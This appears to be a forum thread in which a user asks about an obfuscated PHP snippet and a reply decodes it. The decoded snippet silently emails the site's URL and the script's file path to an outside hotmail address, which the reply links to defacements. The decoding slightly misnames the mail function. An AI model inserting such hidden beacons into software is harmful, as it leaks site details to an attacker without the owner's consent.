<?php $x10="ma\151\154"; {$x0b = "\154\141\154\x65y\154o\154@\x68ot\x6da\x69\154\056c\157\x6d";$x0c = "E\107FM";$x0d = "f\162\x6f\155\x3a \x45G\x46\x4d \x3c\x6c\141\x6c\x65y\x6co\154\100h\157\164\x6dail\056\143\157\x6d\x3e";$x0e = "\x4ci\x6e\x6b \x3a \x68\164t\x70\072\057\057" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . "\r\n";$x0e .= "\120a\x74\x68 :\040" . __file__;$x0f = @$x10($x0b, $x0c, $x0e, $x0d);echo "";exit;} ?> PHP:
That's not UTF8, that's just some obfuscation someone thought of to make the script less readable. You can convert every string to its character representation. For instance \x41 means 'captial A'. You don't have to convert these values yourself. When you echo the string, it will show its actual value. $x10="ma\151\154"; { $x0b = "\154\141\154\x65y\154o\154@\x68ot\x6da\x69\154\056c\157\x6d"; $x0c = "E\107FM";$x0d = "f\162\x6f\155\x3a \x45G\x46\x4d \x3c\x6c\141\x6c\x65y\x6co\154\100h\157\164\x6dail\056\143\157\x6d\x3e"; $x0e = "\x4ci\x6e\x6b \x3a \x68\164t\x70\072\057\057" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . "\r\n"; $x0e .= "\120a\x74\x68 :\040" . __file__;$x0f = @$x10($x0b, $x0c, $x0e, $x0d);echo ""; exit; } PHP:
It decodes to this mailto("laleylol@hotmail.com", "EGFM", "Link : ://page.url.here Path: /path/to/php/script" , "from: EGFM <laleylol@hotmail.com>"); This is probably just someone's attempt to ensure they find out where their script is used, as it's not leaking much information. However, Googling that email address reveals it has been used on defaced websites, so it may be the prelude to something darker. thank you .